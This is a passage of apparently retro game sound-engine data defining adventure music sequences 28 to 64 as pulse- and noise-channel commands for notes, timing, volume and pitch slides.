WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,39) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) SAMPLE_END .) music_adventure_sample_28: .( CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,34) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,36) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,34) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,44) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,46) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,41) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) SAMPLE_END .) music_adventure_sample_29: .( AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_NOTE_DUT_DSLIDE(48,1,2,0) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_HIGH(7) HALT(0) AUDIO_PULSE_META_NOTE_DUT_VOL(46,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_HIGH(7) HALT(0) AUDIO_PULSE_META_NOTE_DUT_VOL(44,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_HIGH(7) HALT(0) AUDIO_PULSE_META_NOTE_DUT_VOL(43,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_HIGH(7) HALT(0) SAMPLE_END .) music_adventure_sample_30: .( AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(46,1,0,1,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(48,1,0,1) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(46,1,0,1) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) SAMPLE_END .) music_adventure_sample_31: .( AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(43,1,0,1,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) SAMPLE_END .) music_adventure_sample_32: .( AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(39,1,0,1,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(41,1,0,1) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(39,1,0,1) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) SAMPLE_END .) music_adventure_sample_33: .( AUDIO_PULSE_META_WAIT_DSLIDE(1,3) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) PITCH_SLIDE(0) HALT(0) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,39) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) SAMPLE_END .) music_adventure_sample_34: .( AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(53,1,0,1,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(1,0) AUDIO_PULSE_META_NOTE_DUT_VOL(48,1,0,1) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(46,1,0,1) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(48,1,0,1) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) SAMPLE_END .) music_adventure_sample_35: .( AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(46,1,0,1,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) SAMPLE_END .) music_adventure_sample_36: .( AUDIO_PULSE_META_WAIT_DSLIDE(1,3) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) PITCH_SLIDE(0) HALT(0) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,46) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(43,1,0,1,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(36,1,0,1,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(44,1,0,1,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(36,1,0,1,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(46,1,0,1,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(48,1,0,1,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) SAMPLE_END .) music_adventure_sample_37: .( AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(51,1,2,3,0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(0) SAMPLE_END .) music_adventure_sample_38: .( AUDIO_PULSE_META_NOTE_DSLIDE(39,1,15) AUDIO_PULSE_META_NOTE_DSLIDE(38,1,0) PLAY_TIMED_NOTE(0,36) PLAY_TIMED_NOTE(0,34) PLAY_TIMED_NOTE(0,32) SAMPLE_END .) music_adventure_sample_39: .( AUDIO_PULSE_META_NOTE_DSLIDE(41,1,15) AUDIO_PULSE_META_NOTE_DSLIDE(40,1,0) PLAY_TIMED_NOTE(0,38) PLAY_TIMED_NOTE(0,36) PLAY_TIMED_NOTE(0,34) PLAY_TIMED_NOTE(0,32) PLAY_TIMED_NOTE(0,30) PLAY_TIMED_NOTE(2,29) AUDIO_PULSE_META_NOTE_USLIDE(43,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) AUDIO_PULSE_META_NOTE_USLIDE(41,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) AUDIO_PULSE_META_NOTE_USLIDE(39,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) AUDIO_PULSE_META_NOTE_USLIDE(36,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(7,0) AUDIO_PULSE_META_WAIT_USLIDE(1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) HALT(0) AUDIO_PULSE_META_NOTE_USLIDE(34,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(7,0) AUDIO_PULSE_META_NOTE_DSLIDE(41,1,15) AUDIO_PULSE_META_NOTE_DSLIDE(40,1,0) PLAY_TIMED_NOTE(0,38) PLAY_TIMED_NOTE(0,36) PLAY_TIMED_NOTE(0,34) PLAY_TIMED_NOTE(0,32) PLAY_TIMED_NOTE(0,30) PLAY_TIMED_NOTE(3,29) SAMPLE_END .) music_adventure_sample_40: .( PLAY_TIMED_NOTE(0,30) PLAY_TIMED_NOTE(0,28) PLAY_TIMED_NOTE(2,27) AUDIO_PULSE_META_NOTE_USLIDE(39,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) AUDIO_PULSE_META_NOTE_USLIDE(34,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) AUDIO_PULSE_META_NOTE_USLIDE(36,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) AUDIO_PULSE_META_NOTE_USLIDE(41,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(18,0) AUDIO_PULSE_META_NOTE_USLIDE(39,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) AUDIO_PULSE_META_NOTE_USLIDE(36,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) SAMPLE_END .) music_adventure_sample_41: .( AUDIO_PULSE_META_NOTE_DSLIDE(41,1,15) AUDIO_PULSE_META_NOTE_DSLIDE(40,1,0) PLAY_TIMED_NOTE(0,38) PLAY_TIMED_NOTE(0,36) PLAY_TIMED_NOTE(0,34) PLAY_TIMED_NOTE(0,32) PLAY_TIMED_NOTE(0,30) PLAY_TIMED_NOTE(2,29) AUDIO_PULSE_META_NOTE_USLIDE(43,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) AUDIO_PULSE_META_NOTE_USLIDE(41,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) AUDIO_PULSE_META_NOTE_USLIDE(39,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) AUDIO_PULSE_META_NOTE_USLIDE(36,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(18,0) AUDIO_PULSE_META_NOTE_USLIDE(34,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) AUDIO_PULSE_META_NOTE_DSLIDE(41,1,15) AUDIO_PULSE_META_NOTE_DSLIDE(40,1,0) PLAY_TIMED_NOTE(0,38) PLAY_TIMED_NOTE(0,36) PLAY_TIMED_NOTE(0,34) PLAY_TIMED_NOTE(0,32) PLAY_TIMED_NOTE(0,30) PLAY_TIMED_NOTE(2,29) SAMPLE_END .) music_adventure_sample_42: .( PLAY_TIMED_NOTE(0,30) PLAY_TIMED_NOTE(0,28) PLAY_TIMED_NOTE(2,27) AUDIO_PULSE_META_NOTE_USLIDE(39,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) AUDIO_PULSE_META_NOTE_USLIDE(41,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) SAMPLE_END .) music_adventure_sample_43: .( PLAY_TIMED_NOTE(0,30) PLAY_TIMED_NOTE(0,28) PLAY_TIMED_NOTE(2,27) AUDIO_PULSE_META_NOTE_USLIDE(39,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) AUDIO_PULSE_META_WAIT_DSLIDE(1,15) AUDIO_PULSE_META_NOTE_DSLIDE(38,1,0) PLAY_TIMED_NOTE(0,36) PLAY_TIMED_NOTE(0,34) PLAY_TIMED_NOTE(0,32) PLAY_TIMED_NOTE(0,30) PLAY_TIMED_NOTE(0,28) PLAY_TIMED_NOTE(2,27) HALT(7) WAIT(1) SAMPLE_END .) music_adventure_sample_44: .( PLAY_TIMED_NOTE(0,30) PLAY_TIMED_NOTE(0,28) PLAY_TIMED_NOTE(2,27) SAMPLE_END .) music_adventure_sample_45: .( PLAY_TIMED_NOTE(0,30) PLAY_TIMED_NOTE(0,28) PLAY_TIMED_NOTE(2,27) PLAY_TIMED_NOTE(9,41) PLAY_TIMED_NOTE(9,39) PLAY_TIMED_NOTE(9,36) PLAY_TIMED_NOTE(8,39) AUDIO_PULSE_META_WAIT_DSLIDE(1,15) AUDIO_PULSE_META_NOTE_DSLIDE(38,1,0) PLAY_TIMED_NOTE(0,36) PLAY_TIMED_NOTE(0,34) PLAY_TIMED_NOTE(0,32) PLAY_TIMED_NOTE(0,30) PLAY_TIMED_NOTE(0,28) PLAY_TIMED_NOTE(2,27) HALT(7) WAIT(2) SAMPLE_END .) music_adventure_sample_46: .( PLAY_TIMED_NOTE(0,30) PLAY_TIMED_NOTE(0,28) PLAY_TIMED_NOTE(2,27) AUDIO_PULSE_META_NOTE_DSLIDE(36,1,15) AUDIO_PULSE_META_NOTE_DSLIDE(35,1,0) PLAY_TIMED_NOTE(0,33) PLAY_TIMED_NOTE(0,31) PLAY_TIMED_NOTE(0,29) PLAY_TIMED_NOTE(0,27) PLAY_TIMED_NOTE(0,25) PLAY_TIMED_NOTE(2,24) PLAY_TIMED_NOTE(9,43) PLAY_TIMED_NOTE(9,41) AUDIO_PULSE_META_NOTE_DSLIDE(36,1,15) AUDIO_PULSE_META_NOTE_DSLIDE(35,1,0) PLAY_TIMED_NOTE(0,33) PLAY_TIMED_NOTE(0,31) PLAY_TIMED_NOTE(0,29) PLAY_TIMED_NOTE(0,27) PLAY_TIMED_NOTE(0,25) PLAY_TIMED_NOTE(2,24) PLAY_TIMED_NOTE(9,41) AUDIO_PULSE_META_NOTE_DSLIDE(36,1,15) AUDIO_PULSE_META_NOTE_DSLIDE(35,1,0) PLAY_TIMED_NOTE(0,33) PLAY_TIMED_NOTE(0,31) PLAY_TIMED_NOTE(0,29) PLAY_TIMED_NOTE(0,27) PLAY_TIMED_NOTE(0,25) PLAY_TIMED_NOTE(2,24) AUDIO_PULSE_META_NOTE_DSLIDE(36,1,15) AUDIO_PULSE_META_NOTE_DSLIDE(35,1,0) PLAY_TIMED_NOTE(0,33) PLAY_TIMED_NOTE(0,31) PLAY_TIMED_NOTE(0,29) PLAY_TIMED_NOTE(0,27) PLAY_TIMED_NOTE(0,25) PLAY_TIMED_NOTE(1,24) AUDIO_PULSE_META_NOTE_DSLIDE(36,1,15) AUDIO_PULSE_META_NOTE_DSLIDE(35,1,0) PLAY_TIMED_NOTE(0,33) PLAY_TIMED_NOTE(0,31) PLAY_TIMED_NOTE(0,29) PLAY_TIMED_NOTE(0,27) PLAY_TIMED_NOTE(0,25) PLAY_TIMED_NOTE(3,24) SAMPLE_END .) music_adventure_sample_47: .( PLAY_TIMED_NOTE(4,43) PLAY_TIMED_NOTE(4,46) PLAY_TIMED_NOTE(4,43) SAMPLE_END .) music_adventure_sample_48: .( AUDIO_PULSE_META_NOTE_DSLIDE(41,1,15) AUDIO_PULSE_META_NOTE_DSLIDE(40,1,0) PLAY_TIMED_NOTE(0,38) PLAY_TIMED_NOTE(0,36) PLAY_TIMED_NOTE(0,34) PLAY_TIMED_FREQ(297,65) SAMPLE_END .) music_adventure_sample_49: .( HALT(4) SAMPLE_END .) music_adventure_sample_50: .( PLAY_TIMED_FREQ(333,55) AUDIO_PULSE_META_WAIT_DSLIDE(1,15) AUDIO_PULSE_META_NOTE_DSLIDE(38,1,0) PLAY_TIMED_NOTE(0,36) PLAY_TIMED_NOTE(0,34) PLAY_TIMED_NOTE(0,32) PLAY_TIMED_NOTE(0,30) PLAY_TIMED_NOTE(0,28) PLAY_TIMED_NOTE(2,27) SAMPLE_END .) music_adventure_sample_51: .( AUDIO_PULSE_META_NOTE_DSLIDE(37,1,15) AUDIO_PULSE_META_NOTE_DSLIDE(36,1,0) PLAY_TIMED_NOTE(0,34) PLAY_TIMED_NOTE(0,32) PLAY_TIMED_NOTE(0,30) PLAY_TIMED_FREQ(374,65) AUDIO_PULSE_META_WAIT_DSLIDE(1,15) AUDIO_PULSE_META_NOTE_DSLIDE(36,1,0) PLAY_TIMED_NOTE(0,34) PLAY_TIMED_NOTE(0,32) PLAY_TIMED_NOTE(0,30) PLAY_TIMED_NOTE(0,28) PLAY_TIMED_NOTE(0,26) PLAY_TIMED_NOTE(2,25) SAMPLE_END .) music_adventure_sample_52: .( PLAY_TIMED_NOTE(14,39) AUDIO_PULSE_META_WAIT_DSLIDE(1,15) AUDIO_PULSE_META_NOTE_DSLIDE(38,1,0) PLAY_TIMED_NOTE(0,36) PLAY_TIMED_NOTE(0,34) PLAY_TIMED_NOTE(0,32) HALT(4) SAMPLE_END .) music_adventure_sample_53: .( PLAY_TIMED_FREQ(333,25) AUDIO_PULSE_META_WAIT_DSLIDE(1,15) AUDIO_PULSE_META_NOTE_DSLIDE(38,1,0) PLAY_TIMED_NOTE(0,36) PLAY_TIMED_NOTE(0,34) PLAY_TIMED_NOTE(0,32) HALT(4) SAMPLE_END .) music_adventure_sample_54: .( PLAY_TIMED_NOTE(14,39) AUDIO_PULSE_META_WAIT_DSLIDE(1,15) AUDIO_PULSE_META_NOTE_DSLIDE(38,1,0) PLAY_TIMED_NOTE(0,36) PLAY_TIMED_NOTE(0,34) PLAY_TIMED_NOTE(0,32) PLAY_TIMED_NOTE(0,30) PLAY_TIMED_NOTE(0,28) PLAY_TIMED_NOTE(2,27) SAMPLE_END .) music_adventure_sample_55: .( PLAY_TIMED_NOTE(0,30) PLAY_TIMED_NOTE(0,28) PLAY_TIMED_NOTE(12,27) SAMPLE_END .) music_adventure_sample_56: .( PLAY_TIMED_NOTE(0,30) PLAY_TIMED_NOTE(0,28) PLAY_TIMED_NOTE(2,27) PLAY_TIMED_NOTE(9,36) PLAY_TIMED_NOTE(9,39) SAMPLE_END .) music_adventure_sample_57: .( AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(2) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(2) SAMPLE_END .) music_adventure_sample_58: .( AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(6) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(0) AUDIO_NOISE_WAIT(1) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(4) SAMPLE_END .) music_adventure_sample_59: .( AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(2) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(1) SAMPLE_END .) music_adventure_sample_60: .( AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(2) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(11,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(6) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(0) AUDIO_NOISE_WAIT(1) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(11,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(6) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(0) AUDIO_NOISE_WAIT(1) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(4) SAMPLE_END .) music_adventure_sample_61: .( AUDIO_PULSE_META_WAIT_DUT_USLIDE(1,2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(1,0) CHAN_VOLUME_HIGH(6) WAIT(0) AUDIO_PULSE_META_WAIT_VOL_DSLIDE(1,13,1) CHAN_VOLUME_HIGH(4) WAIT(0) AUDIO_PULSE_META_WAIT_VOL_DSLIDE(1,11,0) CHAN_VOLUME_HIGH(2) WAIT(0) AUDIO_PULSE_META_WAIT_VOL_USLIDE(1,9,-1) CHAN_VOLUME_HIGH(0) WAIT(0) AUDIO_PULSE_META_WAIT_VOL_DSLIDE(2,7,0) SAMPLE_END .) music_adventure_sample_62: .( AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(36,1,0,15,0) SAMPLE_END .) music_adventure_sample_63: .( AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_NOTE_DUT_VOL(34,1,0,15) SAMPLE_END .) music_adventure_sample_64: .( AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) 